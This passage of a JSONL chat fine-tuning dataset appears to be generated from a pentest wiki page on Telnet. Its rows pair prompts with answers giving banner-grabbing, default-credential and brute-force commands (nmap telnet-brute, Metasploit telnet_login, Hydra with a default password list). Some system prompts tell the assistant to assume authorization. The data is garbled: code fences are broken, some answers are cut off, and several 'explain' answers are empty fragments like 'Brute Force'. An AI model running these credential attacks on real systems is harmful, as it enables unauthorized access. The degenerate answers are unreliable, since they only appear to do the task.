$TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP\n``\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Telnet - Banner grabbing?", "response": "To initiate a connection with telnet server and get any information about the target .\n\n> [!TIP]\n> The $TARGET_PORT is optional, but the default port is 23\n\n::: tabs\n\n=== Unix-like\n\nThe Telnet banner of a target can be captured using multiple tools on UNIX-like systems.\n\n``bash\n#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"telnet and safe\" $TARGET_IP\n`\nThe Metasploit framework can also be used to make this work.\n\n`\nmsf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit\n`\n\n=== Windows\n\nOn Windows systems, multiple tools can be used to capture the Telnet banner of a target.\n\n`powershell\nnc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP\n``\n:::", "metadata": {"corpus_index": 1547, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Telnet - Banner grabbing"}, {"role": "assistant", "content": "To initiate a connection with telnet server and get any information about the target .\n\n> [!TIP]\n> The $TARGET_PORT is optional, but the default port is 23\n\n::: tabs\n\n=== Unix-like\n\nThe Telnet banner of a target can be captured using multiple tools on UNIX-like systems.\n\n``bash\n#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"telnet and safe\" $TARGET_IP\n`\nThe Metasploit framework can also be used to make this work.\n\n`\nmsf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit\n`\n\n=== Windows\n\nOn Windows systems, multiple tools can be used to capture the Telnet banner of a target.\n\n`powershell\nnc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP\n``\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Telnet - Banner grabbing", "response": "To initiate a connection with telnet server and get any information about the target .\n\n> [!TIP]\n> The $TARGET_PORT is optional, but the default port is 23\n\n::: tabs\n\n=== Unix-like\n\nThe Telnet banner of a target can be captured using multiple tools on UNIX-like systems.\n\n``bash\n#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"telnet and safe\" $TARGET_IP\n`\nThe Metasploit framework can also be used to make this work.\n\n`\nmsf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit\n`\n\n=== Windows\n\nOn Windows systems, multiple tools can be used to capture the Telnet banner of a target.\n\n`powershell\nnc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP\n``\n:::", "metadata": {"corpus_index": 1547, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Using command for 🛠️ telnet - banner grabbing"}, {"role": "assistant", "content": "#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"*telnet* and safe\" $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Using command for 🛠️ telnet - banner grabbing", "response": "#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"*telnet* and safe\" $TARGET_IP", "metadata": {"corpus_index": 1548, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Using"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Telnet - Banner grabbing?"}, {"role": "assistant", "content": "#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"*telnet* and safe\" $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Telnet - Banner grabbing?", "response": "#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"*telnet* and safe\" $TARGET_IP", "metadata": {"corpus_index": 1548, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the msf command for 🛠️ telnet - banner grabbing"}, {"role": "assistant", "content": "msf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the msf command for 🛠️ telnet - banner grabbing", "response": "msf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit", "metadata": {"corpus_index": 1549, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "msf"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Telnet - Banner grabbing?"}, {"role": "assistant", "content": "msf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Telnet - Banner grabbing?", "response": "msf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit", "metadata": {"corpus_index": 1549, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `msf > use auxiliary/scanner/telnet/telnet_version`?"}, {"role": "assistant", "content": "This command is used for 🛠️ telnet - banner grabbing. Banner grabbing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `msf > use auxiliary/scanner/telnet/telnet_version`?", "response": "This command is used for 🛠️ telnet - banner grabbing. Banner grabbing", "metadata": {"corpus_index": 1549, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the nc.exe syntax for 🛠️ telnet - banner grabbing?"}, {"role": "assistant", "content": "nc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the nc.exe syntax for 🛠️ telnet - banner grabbing?", "response": "nc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP", "metadata": {"corpus_index": 1550, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nc.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Telnet - Banner grabbing?"}, {"role": "assistant", "content": "nc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Telnet - Banner grabbing?", "response": "nc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p $TARGET_PORT --script telnet-ntlm-info.nse $TARGET_IP", "metadata": {"corpus_index": 1550, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nc.exe -nv $TARGET_IP $TARGET_PORT`?"}, {"role": "assistant", "content": "This command is used for 🛠️ telnet - banner grabbing. Banner grabbing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nc.exe -nv $TARGET_IP $TARGET_PORT`?", "response": "This command is used for 🛠️ telnet - banner grabbing. Banner grabbing", "metadata": {"corpus_index": 1550, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Telnet - Passwordless authentication"}, {"role": "assistant", "content": "Telnet can be configured to allow users to connect to a server without needing a specific identity by utilizing a passwordless login feature. This method is commonly employed for accessing or downloading public files.\n\nTo connect without a password, one would use the following command:\n\n```bash\ntelnet $TARGET_IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Telnet - Passwordless authentication", "response": "Telnet can be configured to allow users to connect to a server without needing a specific identity by utilizing a passwordless login feature. This method is commonly employed for accessing or downloading public files.\n\nTo connect without a password, one would use the following command:\n\n```bash\ntelnet $TARGET_IP", "metadata": {"corpus_index": 1551, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Telnet - Passwordless authentication"}, {"role": "assistant", "content": "Telnet can be configured to allow users to connect to a server without needing a specific identity by utilizing a passwordless login feature. This method is commonly employed for accessing or downloading public files.\n\nTo connect without a password, one would use the following command:\n\n```bash\ntelnet $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Telnet - Passwordless authentication", "response": "Telnet can be configured to allow users to connect to a server without needing a specific identity by utilizing a passwordless login feature. This method is commonly employed for accessing or downloading public files.\n\nTo connect without a password, one would use the following command:\n\n```bash\ntelnet $TARGET_IP", "metadata": {"corpus_index": 1551, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Telnet - Common credentials"}, {"role": "assistant", "content": "If anonymous login is disabled on the Telnet server, trying common usernames and passwords like admin, administrator, root, user, or test can be a good initial step. This approach is less aggressive than attempting to guess passwords through brute force and is recommended to try first when accessing a server.\n\n```bash\ntelnet $TARGET_IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Telnet - Common credentials", "response": "If anonymous login is disabled on the Telnet server, trying common usernames and passwords like admin, administrator, root, user, or test can be a good initial step. This approach is less aggressive than attempting to guess passwords through brute force and is recommended to try first when accessing a server.\n\n```bash\ntelnet $TARGET_IP", "metadata": {"corpus_index": 1552, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Telnet - Common credentials?"}, {"role": "assistant", "content": "If anonymous login is disabled on the Telnet server, trying common usernames and passwords like admin, administrator, root, user, or test can be a good initial step. This approach is less aggressive than attempting to guess passwords through brute force and is recommended to try first when accessing a server.\n\n```bash\ntelnet $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Telnet - Common credentials?", "response": "If anonymous login is disabled on the Telnet server, trying common usernames and passwords like admin, administrator, root, user, or test can be a good initial step. This approach is less aggressive than attempting to guess passwords through brute force and is recommended to try first when accessing a server.\n\n```bash\ntelnet $TARGET_IP", "metadata": {"corpus_index": 1552, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Telnet - Brute Force?"}, {"role": "assistant", "content": "::: tabs\n\n=== Nmap\n\n``bash\nnmap -p 23 --script telnet-brute $TARGET_IP\n`\n\n=== Metasploit framework\n\n`\nuse auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit\n`\n\n=== Hydra\n\n`bash\nhydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Telnet - Brute Force?", "response": "::: tabs\n\n=== Nmap\n\n``bash\nnmap -p 23 --script telnet-brute $TARGET_IP\n`\n\n=== Metasploit framework\n\n`\nuse auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit\n`\n\n=== Hydra\n\n`bash\nhydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet\n``\n\n:::", "metadata": {"corpus_index": 1553, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Telnet - Brute Force"}, {"role": "assistant", "content": "::: tabs\n\n=== Nmap\n\n``bash\nnmap -p 23 --script telnet-brute $TARGET_IP\n`\n\n=== Metasploit framework\n\n`\nuse auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit\n`\n\n=== Hydra\n\n`bash\nhydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Telnet - Brute Force", "response": "::: tabs\n\n=== Nmap\n\n``bash\nnmap -p 23 --script telnet-brute $TARGET_IP\n`\n\n=== Metasploit framework\n\n`\nuse auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit\n`\n\n=== Hydra\n\n`bash\nhydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet\n``\n\n:::", "metadata": {"corpus_index": 1553, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the nmap command to 🛠️ telnet - brute force"}, {"role": "assistant", "content": "nmap -p 23 --script telnet-brute $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the nmap command to 🛠️ telnet - brute force", "response": "nmap -p 23 --script telnet-brute $TARGET_IP", "metadata": {"corpus_index": 1554, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Telnet - Brute Force"}, {"role": "assistant", "content": "nmap -p 23 --script telnet-brute $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Telnet - Brute Force", "response": "nmap -p 23 --script telnet-brute $TARGET_IP", "metadata": {"corpus_index": 1554, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nmap -p 23 --script telnet-brute $TARGET_IP`?"}, {"role": "assistant", "content": "This command is used for 🛠️ telnet - brute force. Brute Force"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nmap -p 23 --script telnet-brute $TARGET_IP`?", "response": "This command is used for 🛠️ telnet - brute force. Brute Force", "metadata": {"corpus_index": 1554, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the use command to 🛠️ telnet - brute force"}, {"role": "assistant", "content": "use auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the use command to 🛠️ telnet - brute force", "response": "use auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit", "metadata": {"corpus_index": 1555, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "use"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Telnet - Brute Force"}, {"role": "assistant", "content": "use auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Telnet - Brute Force", "response": "use auxiliary/scanner/telnet/telnet_login\nmsf auxiliary(telnet_login) > set rhosts $TARGET_IP\nmsf auxiliary(telnet_login) > set user_file /path/to/user.txt\nmsf auxiliary(telnet_login) > set pass_file /path/to/pass.txt\nmsf auxiliary(telnet_login) > set stop_on_success true\nmsf auxiliary(telnet_login) > exploit", "metadata": {"corpus_index": 1555, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `use auxiliary/scanner/telnet/telnet_login`?"}, {"role": "assistant", "content": "This command is used for 🛠️ telnet - brute force. Brute Force"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `use auxiliary/scanner/telnet/telnet_login`?", "response": "This command is used for 🛠️ telnet - brute force. Brute Force", "metadata": {"corpus_index": 1555, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use hydra for 🛠️ telnet - brute force?"}, {"role": "assistant", "content": "hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use hydra for 🛠️ telnet - brute force?", "response": "hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet", "metadata": {"corpus_index": 1556, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hydra"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Telnet - Brute Force"}, {"role": "assistant", "content": "hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Telnet - Brute Force", "response": "hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP\n\nhydra -l 